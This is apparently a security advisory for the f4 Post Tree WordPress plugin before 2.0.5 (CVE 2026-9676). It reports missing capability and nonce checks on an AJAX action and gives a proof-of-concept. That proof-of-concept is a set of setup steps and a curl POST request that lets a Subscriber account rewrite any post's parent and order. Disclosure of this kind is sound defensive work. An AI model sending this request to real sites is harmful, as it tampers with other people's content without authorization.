f4 Post Tree < 2.0.5 – Subscriber+ Arbitrary Post Parent/Menu Order Modification | CVE 2026-9676

Description

The plugin does not perform capability checks or CSRF/nonce verification on one of its AJAX actions, allowing authenticated users with Subscriber-level access and above to modify the parent and menu order of arbitrary posts.

Proof of Concept

1. As an Administrator, create two pages (e.g. Page A with ID 3 and Page B with ID 4), both with post_parent = 0.
2. Log in as a Subscriber user.
3. Send the following request from the Subscriber session:

curl '{TARGET}/wp-admin/admin-ajax.php?action=f4_tree_move_post' \
  -X POST \
  --data-urlencode 'post_id=4' \
  --data-urlencode 'post_type=page' \
  --data-urlencode 'posts_sorted=[{"post_id":4,"parent_post_id":3}]' \
  -b 'wordpress_logged_in_HASH=subscriber_cookie'

4. The response returns HTTP 200 with a JSON body, and page 4's post_parent is now set to 3, confirming a Subscriber modified the page hierarchy. The same primitive works against any post via post_type=post.